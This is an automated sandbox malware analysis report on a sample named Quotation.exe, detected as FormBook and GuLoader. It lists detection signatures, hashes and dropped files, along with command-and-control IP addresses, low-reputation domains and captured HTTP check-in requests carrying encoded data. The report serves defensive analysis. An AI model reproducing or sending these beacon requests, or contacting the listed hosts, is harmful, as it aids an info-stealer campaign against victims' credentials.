Windows Analysis Report
Quotation.exe

Overview

General Information

Sample Name: Quotation.exe
Analysis ID: 830618
MD5: 8a81948116d2ea79bee1d261733dba89
SHA1: 5cf4113debe6d37bd770d8d3870647b8bac082a3
SHA256: 5a64a3fd65f7176b7ad623893e3cb573af13eb51850f8243a1951884eee757a9
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Quotation.exe Virustotal: Detection: 18% Perma Link
Source: Quotation.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 12.2.explorer.exe.13773814.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.control.exe.4dd3814.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.firefox.exe.129e3814.0.unpack Avira: Label: TR/Patched.Ren.Gen
Uses 32bit PE files
Source: Quotation.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49854 version: TLS 1.2
Source: Quotation.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
Source: Binary string: maintenanceservice.pdb@ 0%P% source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
Source: Binary string: mshtml.pdb source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
Source: Binary string: control.pdb source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr
Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: maintenanceservice.pdb source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
Source: Binary string: firefox.pdb source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_004062DD FindFirstFileA,FindClose, 1_2_004062DD
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 1_2_004057A2
Source: C:\Users\user\Desktop\Quotation.exe Code function: 1_2_00402765 FindFirstFileA, 1_2_00402765
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.184.0.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.194.145.38 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.192.26.35 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.215.156.6 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.117.168.233 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.196 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.83.160.9 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.91 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.17.29.148 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 88.212.206.251 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.67.212.220 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.58.118.167 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.dexmart.xyz
Yara detected Generic Downloader
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll, type: DROPPED
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOSTNETNL HOSTNETNL
Source: Joe Sandbox View ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&6SE=F8zFuLn HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&6SE=F8zFuLn HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&6SE=F8zFuLn HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&6SE=F8zFuLn HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&6SE=F8zFuLn HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&6SE=F8zFuLn HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&6SE=F8zFuLn HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&6SE=F8zFuLn HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&6SE=F8zFuLn HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.192.26.35 199.192.26.35
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 20 Mar 2023 14:00:57 GMTContent-Type: text/htmlContent-Length: 62299Connection: closeETag: "627b7393-f35b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 14:01:20 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=JLFAOJLDJFMOGDBJJHJKJGDI; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:01:53 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
